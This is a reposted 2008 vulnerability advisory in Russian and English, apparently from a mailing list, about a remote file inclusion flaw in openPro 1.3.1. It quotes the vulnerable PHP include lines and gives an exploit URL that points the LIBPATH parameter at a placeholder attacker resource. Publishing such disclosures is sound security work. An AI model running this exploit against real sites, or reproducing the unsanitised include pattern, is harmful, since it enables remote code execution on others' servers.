Уведомление о безопасности: openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)
  [ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability
  [DSECRG-08-029] Local File Include in   Dokeos E-Learning System 1.8.5
  communitycms-0.1 Remote File Includion
  Cross-Site Scripting vulnerabilities in CNCat

From: Ghost hacker <ghost-r00t_(at)_hotmail.com>
Date: 18 июля 2008 г.
Subject: openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability

#################################################################################
####################
openPro 1.3.1 (LIBPATH) Remote RFI Vulnerability
#################################################################################
#####################
[~] Found : Ghost Hacker [ R-H TeaM ]           |, .-. .-. ,|
[~] HOME : www.Real-Hack.net                   | )(_o/ \o_)( |
[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
[~] Script : openPro 1.3.1
[~] Download Script : https://sourceforge.net/project/showfiles.php?group_id=136953
############################# [ I love the Messenger of Allah Mohammad ] #############################
[~] Error ( search_wA.php ) :
include_once($LIBPATH."/db.php");
include_once($LIBPATH."/stdlib.php");
include_once($LIBPATH."/users.php");
include_once($LIBPATH."/windows.php");
[~] Exploit :
http://xxxx/[path]/search_wA.php?LIBPATH=[Evil]
############################# [ I love the Messenger of Allah Mohammad ] ############################
[~] Greetz :
QaTaR BoeZ TeaM & Aseg-Rabe7 & PROTO & x.CJP.x & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Members Real Hack And All My Friends And My Team ..
#################################################################################
#####################
Real-hack.Net ( R-H TeaM ) ..
#################################################################################
#####################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

test server